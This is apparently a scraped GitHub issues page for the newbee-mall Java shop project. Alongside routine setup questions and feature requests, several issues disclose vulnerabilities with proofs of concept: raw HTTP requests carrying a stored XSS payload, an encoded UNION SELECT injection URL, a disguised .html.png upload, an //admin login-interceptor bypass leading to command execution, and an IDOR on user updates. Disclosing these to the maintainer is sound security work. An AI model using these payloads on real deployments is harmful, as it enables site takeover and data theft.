newbee-ltd / newbee-mall Goto Github PK

修复在后台下架商品前台扔能搜索到的bug

数据库脚本呢

AdminLoginInterceptor存在绕过风险，uri.startsWith("/admin"）可以用../绕过，建议对uri进行归一化处理后再进行操作

admin/upload/file接口，任意文件上传+跨目录上传，结合上AdminLoginInterceptor的绕过很容易被种马

地址：https://github.com/wayn111/newbee-mall

大佬，商品图片好像不显示，我解压那个upload文件，然后在static新建一个goods-img文件夹也不显示呢

三哥，能否把缓存机制整合进来

建议师傅加上售后服务和商品评价功能！

suggest use lombok

rt

我按“项目初体验：启动和使用新蜂商城”中所讲，将sql脚本导入新建的数据库中。用的连接工具是navicat for mysql。
工具报错：You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '(0) NOT NULL DEFAULT CURRENT_TIMESTAMP COMMENT '创建时间', create_user i' at line 7。
是mysql版本问题吗？我版本是5.5.58

大佬您好，后台商品管理怎么上传图片的呢，没看到有图片上传

有个基本的框架吧

如何看待开源软件的知识产权问题
这样后续任何使用该项目的人都可以清晰的了解到使用范围，而不是使用 GPL 协议加软件著作权，还得仔细看看他俩的内容。
举个例子：如果我使用该软件并且修改了还售卖服务，我只要开源就好了（根据 GPL），不需要获得原作者的授权。那对于软件著作权来说我需要获得原作者的授权么？没有仔细了解，不清楚。

[Suggested description]
There is a cross site scripting vulnerability in the commodity information modification module in the main version of NewBee mall. The vulnerability stems from the fact that the form submission module that modifies the commodity information does not restrict or escape the sensitive characters entered, causing the execution of malicious JS code to trigger JS pop-up.

[Vulnerability Type]
Cross site scripting vulnerability

[Vendor of Product]
https://github.com/newbee-ltd/newbee-mall

[Affected Product Code Base]
v1.0.0

[Affected Component]

POST /admin/goods/update HTTP/1.1
Host: localhost:28089
Content-Length: 392
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="92"
Accept: */*
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
Content-Type: application/json
Origin: http://localhost:28089
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost:28089/admin/goods/edit/10907
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: locale=zh-cn; Hm_lvt_a4980171086658b20eb2d9b523ae1b7b=1645520663,1645696647; JSESSIONID=5B28A8C926D035BCC4A809131899B51D
Connection: close

{"goodsId":"10907","goodsName":"鐖辩柉<script>alert(\"xss\")</script>","goodsIntro":"xxx","goodsCategoryId":"47","tag":"鐖辩柉","originalPrice":"1","sellingPrice":"1","stockNum":"0","goodsDetailContent":"<p>hhh</p><p><br/></p>","goodsCoverImg":"http://localhost:28089/upload/20220303_10153124.html","goodsCarousel":"http://localhost:28089/upload/20220303_10153124.html","goodsSellStatus":"0"}

[Impact Code execution]
true

[Vulnerability proof]
1.Access address http://localhost:28089/admin/goods , select the commodity information to be modified and enter information editing.

2.Enter <script>alert(“xss”)</script> in the input box and click Save to complete the form information submission.

3.The pop-up window is triggered when the page is refreshed, and the loophole reproduction is completed

Can share the background database come out？

eg: request.getSession().setAttribute("itemsTotal", itemsTotal); 在前端引用itemsTotal时加session. 要不前段无法解析

1、The authentication logic of the system's background /admin is in code AdminLoginInterceptor：

2、This can easily be bypassed, like request //admin:
1)We delete the requested cookie field and then request /admin,returns 302：

2）But if we request //admin，We can perform administrator actions without logging in，
For example, upload a babat file：

It can execute any server command，such as calc：

在spring中unit test也是极其重要的一环，希望可以增加unit test的部分来和代码形成互相验证

1、Build an environment to simulate users selecting products at the front desk——add to cart——confirm order-pay：
http://127.0.0.1:28089/shop-cart/settle
Insert the payload here at the harvest information:

阿里直招，社招校招均有，BU囊括电商零售系统全链路，前端至交易、详情页，后端至仓储、履约，更有海外复杂场景等你实践，有意请邮件简历至 liuzhu.wlz#alibaba-inc.com
校招的潜力股，勇敢发来简历吧，会邀请进校招小群，定期分享写简历的技巧，更有优先面试的机会

公司/团队介绍
我们是阿里巴巴集团新零售技术旗下供应链技术国际化团队，我们致力于通过世界一流的全球化技术服务来自全球10亿+的海外消费者，为全球消费者带去极致的购物体验，让买全球卖全球的使命落地成为普惠全球的显示图景。我们服务的业务实体有 lazada、AliExpress、天猫海外、Daraz、Trendyol等平台。

联系方式
邮箱： liuzhu.wlz#alibaba-inc.com

\src\main\resources\mapper\NewBeeMallGoodsMapper.xml

    <select id="findNewBeeMallGoodsListBySearch" parameterType="Map" resultMap="BaseResultMap">
        select
        <include refid="Base_Column_List"/>
        from tb_newbee_mall_goods_info
        <where>
            <if test="keyword!=null and keyword!=''">
                and (goods_name like CONCAT('%','${keyword}','%') or goods_intro like CONCAT('%','${keyword}','%'))
            </if>
            <if test="goodsCategoryId!=null and goodsCategoryId!=''">
                and goods_category_id = #{goodsCategoryId}
            </if>
        </where>
        <if test="orderBy!=null and orderBy!=''">
            <choose>
                <when test="orderBy == 'new'">
                    <!-- 按照发布时间倒序排列 -->
                    order by goods_id desc
                </when>
                <when test="orderBy == 'price'">
                    <!-- 按照售价从小到大排列 -->
                    order by selling_price asc
                </when>
                <otherwise>
                    <!-- 默认按照库存数量从大到小排列 -->
                    order by stock_num desc
                </otherwise>
            </choose>
        </if>
        <if test="start!=null and limit!=null">
            limit #{start},#{limit}
        </if>
    </select>

Where ${keyword} is used for splicing sql statements, there is a risk of SQL injection.

poc：

http://127.0.0.1:28089/search?goodsCategoryId=&keyword=%5C%25%27%29%29%20%55%4E%49%4F%4E%20%41%4C%4C%20%53%45%4C%45%43%54%20%4E%55%4C%4C%2C%4E%55%4C%4C%2C%4E%55%4C%4C%2C%4E%55%4C%4C%2C%4E%55%4C%4C%2C%4E%55%4C%4C%2C%4E%55%4C%4C%2C%4E%55%4C%4C%2C%4E%55%4C%4C%2C%4E%55%4C%4C%2C%4E%55%4C%4C%2C%4E%55%4C%4C%2C%43%4F%4E%43%41%54%28%30%78%37%31%37%36%36%32%37%38%37%31%2C%49%46%4E%55%4C%4C%28%43%41%53%54%28%43%55%52%52%45%4E%54%5F%55%53%45%52%28%29%20%41%53%20%43%48%41%52%29%2C%30%78%32%30%29%2C%30%78%37%31%36%32%37%38%36%62%37%31%29%2C%4E%55%4C%4C%2C%4E%55%4C%4C%23&orderBy=default

We will find a sql error, which proves that the vulnerability already exists.

建议使用lombok；有些函数过长建议拆分

adding a docker file for the whole project would be usefull

pc 端的源码有没有

[Suggested description]
A file upload vulnerability exists in NewBee mall. Because the upload method of uploadcontroller can bypass the upload restriction by modifying the file format suffix.

[Vulnerability Type]
File upload vulnerability

[Vendor of Product]
https://github.com/newbee-ltd/newbee-mall

[Affected Product Code Base]
v1.0.0

[Affected Component]
POST /admin/upload/file HTTP/1.1
Host: localhost:28089
Content-Length: 671
Cache-Control: max-age=0
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="92"
sec-ch-ua-mobile: ?0
Upgrade-Insecure-Requests: 1
Origin: http://localhost:28089/
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryoXATzrr6JWhnTx5Q
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-Dest: iframe
Referer: http://localhost:28089/admin/goods/edit/10907
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: locale=zh-cn; Hm_lvt_a4980171086658b20eb2d9b523ae1b7b=1645520663,1645696647; JSESSIONID=11D044F12F07C3F2772AC7EE836610E2
Connection: close

------WebKitFormBoundaryoXATzrr6JWhnTx5Q
Content-Disposition: form-data; name="file"; filename="1.html.png"
Content-Type: image/png

        <script>alert("xss")</script>
    </div>
</div>

项目写的这么烂，文档还好意思收费？

作者你好像没有提供商品图片的文件夹，导致不能显示商品的图片。或者还是我自己哪里出错了。

`

大佬后期是否考虑引入Redis、MongoDB、ES等技术

注册的时候出现未知异常请联系管理员,应该怎么解决呀？谢谢你的回答，还有upload应该直接放在resource下边吗

君子爱财,取之有道. 拉自己的qq群玩玩就好了

有两个疑问：

1. 大神能否给出个快速部署的教程，或者给个docker的镜像；
2. 相比展示那么多贴图，有木有用这个搭起来的demo网站。

多谢。

如题，谢谢！

感觉登录页面非空校验用户交互体验不是很好~~~弹框有点鸡肋

1、/personal/updateInfo，this interface can be used to update user information：

2、The corresponding code is as follows：

Track updateUserInfo method：

3、The code updates the information after querying by the value of userid, so you can modify any user information by tampering with the value of userId.

错误信息：nested exception is org.apache.ibatis.exceptions.PersistenceException: ### Error querying database. Cause: org.springframework.jdbc.CannotGetJdbcConnectionException: Failed to obtain JDBC Connection; nested exception is java.sql.SQLNonTransientConnectionException: Could not create connection to database server. Attempted reconnect 3 times. Giving up. ### The error may exist in file [D:\Desktop\newbee-mall-master\target\classes\mapper\GoodsCategoryMapper.xml] ### The error may involve ltd.newbee.mall.dao.GoodsCategoryMapper.selectByLevelAndParentIdsAndNumber ### The error occurred while executing a query ### Cause: org.springframework.jdbc.CannotGetJdbcConnectionException: Failed to obtain JDBC Connection; nested exception is java.sql.SQLNonTransientConnectionException: Could not create connection to database server. Attempted reconnect 3 times. Giving up.

为啥我放在static/goods-img下不显示

大佬，图片上传知道了，就是有个问题，我浏览商品的时候，查看商品详情就让我登录，我想着是购买或者加入购物车的时候再登录，然后我把商城页面登录拦截那里的代码：.addPathPatterns("/goods/detail/**")删掉了，好像不可以呢，点击购买和加入购物车就没反应了